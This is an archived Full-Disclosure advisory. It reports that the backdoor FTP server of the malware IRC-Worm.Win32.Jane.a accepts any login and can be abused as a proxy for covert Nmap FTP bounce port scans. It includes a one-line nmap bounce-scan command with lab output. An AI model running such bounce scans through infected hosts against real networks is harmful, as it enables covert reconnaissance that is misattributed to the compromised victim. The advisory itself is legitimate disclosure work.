lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 29 Mar 2021 22:30:02 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] IRC-Worm.Win32.Jane.a / Authentication Bypass MITM Port Bounce
	Scan

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/2d1d6b0fd55eca12f58b8b6d80f8153f_B.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: IRC-Worm.Win32.Jane.a
Vulnerability: Authentication Bypass MITM Port Bounce Scan
Description: The backdoor FTP server listens on TCP port 21, upon
connecting the server responds with banner "JANE_FTP Server is ready to be
hacked !!! thx Del_Armg0 ...   ; )" making it easily identifiable.
Third-party adversaries can abuse the server as a man-in-the-middle machine
allowing PORT Command bounce scan attacks using Nmap. This vulnerability
allows remote attackers to abuse your system and discreetly conduct network
port scanning. Victims will then think these scans are originating from the
infected system running the afflicted malware FTP Server and not you. This
is easily accomplished as the malware allows anyone to logon using any
username password combination.
Type: PE32
MD5: 2d1d6b0fd55eca12f58b8b6d80f8153f
Vuln ID: MVID-2021-0152
Disclosure: 03/29/2021

Exploit/PoC:
Telnet to ID the vuln JANE_FTP banner, so we can Port scan discreetly.

nmap -n -Pn -b mal:vuln@....168.88.128 192.168.88.131 -p21,22,80 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-29 14:20 Pacific
Daylight Time
Resolved FTP bounce attack proxy to 192.168.88.128 (192.168.88.128).
Attempting connection to ftp://mal:vuln@....168.88.128:21
Connected:220 JANE_FTP Server is ready to be hacked !!! thx Del_Armg0 ...
; )
Login credentials accepted by FTP server!
Initiating Bounce Scan at 14:20
Discovered open port 80/tcp on 192.168.88.131
Completed Bounce Scan at 14:20, 2.10s elapsed (3 total ports)
Nmap scan report for 192.168.88.131
Host is up.

PORT   STATE  SERVICE
21/tcp closed ftp
22/tcp closed ssh
80/tcp open   http

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 11.25 seconds


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ